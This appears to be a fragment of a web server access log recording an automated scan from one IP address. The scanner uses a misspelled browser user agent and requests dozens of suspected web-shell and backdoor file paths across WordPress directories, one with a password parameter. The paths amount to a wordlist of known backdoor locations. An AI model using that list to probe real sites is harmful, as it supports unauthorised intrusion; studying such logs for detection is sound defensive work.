Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:55 -0400] "GET /autoload_classmap.php HTTP/1.1" 301 252 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:55 -0400] "GET /chosen.php?p= HTTP/1.1" 301 244 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:56 -0400] "GET /wp-content/wp-apxupx.php?apx=upx HTTP/1.1" 301 263 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:56 -0400] "GET /wp-content/plugins/wp-apxupx.php?apx=upx HTTP/1.1" 301 271 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:57 -0400] "GET /nice.php?p= HTTP/1.1" 301 242 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:57 -0400] "GET /log.php HTTP/1.1" 301 238 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:57 -0400] "GET /wp-content/plugins/fix/up.php HTTP/1.1" 301 260 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:59 -0400] "GET /class.api.php HTTP/1.1" 301 244 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:59 -0400] "GET /wp-admin/js/widgets/class.api.php HTTP/1.1" 301 264 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:59 -0400] "GET /wp-admin/images/class.api.php HTTP/1.1" 301 260 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:00 -0400] "GET /maint/class.api.php HTTP/1.1" 301 250 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:00 -0400] "GET /wp-admin/network/class_api.php HTTP/1.1" 301 261 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:00 -0400] "GET /wp-content/languages/themes/class_api.php HTTP/1.1" 301 272 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:01 -0400] "GET /wp-admin/includes/class_api.php HTTP/1.1" 301 262 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:01 -0400] "GET /cgi-bin/class_api.php HTTP/1.1" 301 252 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:01 -0400] "GET /.well-known/acme-challenge/class_api.php HTTP/1.1" 301 271 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:02 -0400] "GET /images/class.api.php HTTP/1.1" 301 251 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:02 -0400] "GET /dropdown.php HTTP/1.1" 301 243 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:03 -0400] "GET /cong.php HTTP/1.1" 301 239 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:03 -0400] "GET /wp-includes/images/themes.php HTTP/1.1" 301 260 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:03 -0400] "GET /wp-includes/widgets/themes.php HTTP/1.1" 301 261 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:04 -0400] "GET /wp-includes/ID3/themes.php HTTP/1.1" 301 257 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:04 -0400] "GET /wp-admin/css/themes.php HTTP/1.1" 301 254 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:04 -0400] "GET /wp-includes/sodium_compat/themes.php HTTP/1.1" 301 267 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:05 -0400] "GET /wp-includes/style-engine/themes.php HTTP/1.1" 301 266 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:05 -0400] "GET /wp-includes/PHPMailer/themes.php HTTP/1.1" 301 263 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:06 -0400] "GET /.well-known/pki-validation/themes.php HTTP/1.1" 404 - "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:06 -0400] "GET /wp-includes/sitemaps/themes.php HTTP/1.1" 301 262 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:06 -0400] "GET /wp-includes/blocks/themes.php HTTP/1.1" 301 260 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:07 -0400] "GET /homeroot.php HTTP/1.1" 301 243 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:07 -0400] "GET /defaults.php?p= HTTP/1.1" 301 246 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:07 -0400] "GET /function.php?p= HTTP/1.1" 301 246 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:08 -0400] "GET /old/function.php?p= HTTP/1.1" 301 250 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:08 -0400] "GET /mah/function.php HTTP/1.1" 301 247 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:08 -0400] "GET /mini.php HTTP/1.1" 301 239 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:09 -0400] "GET /.well-known/pki-validation/x.php HTTP/1.1" 404 - "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:09 -0400] "GET /b0.php HTTP/1.1" 301 237 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:09 -0400] "GET /atomlib.php HTTP/1.1" 301 242 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:09 -0400] "GET /wp-admin/dropdown.php HTTP/1.1" 301 252 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:10 -0400] "GET /million.php HTTP/1.1" 301 242 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:10 -0400] "GET /ioxi2.php HTTP/1.1" 301 240 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:11 -0400] "GET /4pric.php HTTP/1.1" 301 240 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:11 -0400] "GET /wp-content/style-css.php HTTP/1.1" 301 255 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:11 -0400] "GET /yanz HTTP/1.1" 301 235 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:12 -0400] "GET /menu HTTP/1.1" 301 235 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:12 -0400] "GET /mailer.php HTTP/1.1" 301 241 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:12 -0400] "GET /leaf-mailer.php HTTP/1.1" 301 246 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:13 -0400] "GET /wp-includes.bak/random_compat/themes.php HTTP/1.1" 301 271 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:13 -0400] "GET /ty.php?p= HTTP/1.1" 301 240 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:13 -0400] "GET /wp-includes/Text/themes.php HTTP/1.1" 301 258 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:14 -0400] "GET /wp-content/upgrade/themes.php HTTP/1.1" 301 260 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:14 -0400] "GET /.tmb/themes.php HTTP/1.1" 301 246 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:15 -0400] "GET /wp-content/upgrade-temp-backup/themes.php HTTP/1.1" 301 272 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:15 -0400] "GET /wp-content/cache/themes.php HTTP/1.1" 301 258 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:15 -0400] "GET /wp-includes/random_compat/themes.php HTTP/1.1" 301 267 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:16 -0400] "GET /cgi-bin/themes.php HTTP/1.1" 301 249 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:16 -0400] "GET /wp-admin/js/about.php HTTP/1.1" 301 252 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:16 -0400] "GET /wp-content/languages/about.php HTTP/1.1" 301 261 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:17 -0400] "GET /wp-includes/customize/about.php HTTP/1.1" 301 262 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:17 -0400] "GET /wp-includes/widgets/about.php HTTP/1.1" 301 260 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:18 -0400] "GET /img/about.php HTTP/1.1" 301 244 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:18 -0400] "GET /wp-includes/Text/about.php HTTP/1.1" 301 257 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:18 -0400] "GET /wp-includes.bak/html-api/about.php HTTP/1.1" 301 265 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:19 -0400] "GET /wp-content/plugins/upload/up.php HTTP/1.1" 301 263 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:19 -0400] "GET /wp-content/plugins/aryabot/mari.php HTTP/1.1" 301 266 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:19 -0400] "GET /site/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282 HTTP/1.1" 301 290 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:20 -0400] "GET /wp-includes/js/tinymce/plugins/compat3x/css/index.php HTTP/1.1" 301 284 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:20 -0400] "GET /wp-admin/images/index.php HTTP/1.1" 301 256 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:20 -0400] "GET /oxi-rex.php HTTP/1.1" 301 242 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:21 -0400] "GET /wp-content/themes/twenty/twenty.php HTTP/1.1" 301 266 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:21 -0400] "GET /updates.php HTTP/1.1" 301 242 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:21 -0400] "GET /libraries/legacy/updates.php HTTP/1.1" 301 259 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:22 -0400] "GET /libraries/phpmailer/updates.php HTTP/1.1" 301 262 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:22 -0400] "GET /libraries/vendor/updates.php HTTP/1.1" 301 259 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:22 -0400] "GET /ok.php HTTP/1.1" 301 237 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:23 -0400] "GET /ccx/index.php HTTP/1.1" 301 244 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:23 -0400] "GET /wp-2019.php HTTP/1.1" 301 242 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:23 -0400] "GET /class-IXR-date.php HTTP/1.1" 301 249 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:24 -0400] "GET /configNRB/admin.php HTTP/1.1" 301 250 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:24 -0400] "GET /dropdown.php HTTP/1.1" 301 243 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:24 -0400] "GET /wp-content/dropdown.php HTTP/1.1" 301 254 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:25 -0400] "GET /wp-includes/dropdown.php HTTP/1.1" 301 255 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:25 -0400] "GET /wp-content/updraft/about.php HTTP/1.1" 301 259 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:26 -0400] "GET /wp-content/upgrade-temp-backup/about.php HTTP/1.1" 301 271 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:26 -0400] "GET /wp-content/banners/about.php HTTP/1.1" 301 259 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:26 -0400] "GET /wp-includes/IXR/about.php HTTP/1.1" 301 256 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:27 -0400] "GET /wp-atom.php HTTP/1.1" 301 242 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:27 -0400] "GET /fw.php HTTP/1.1" 301 237 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:27 -0400] "GET /lock.php HTTP/1.1" 301 239 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:28 -0400] "GET /wp-content/product.php HTTP/1.1" 301 253 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:28 -0400] "GET /wp-content/index.php?x=ooo HTTP/1.1" 301 257 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) 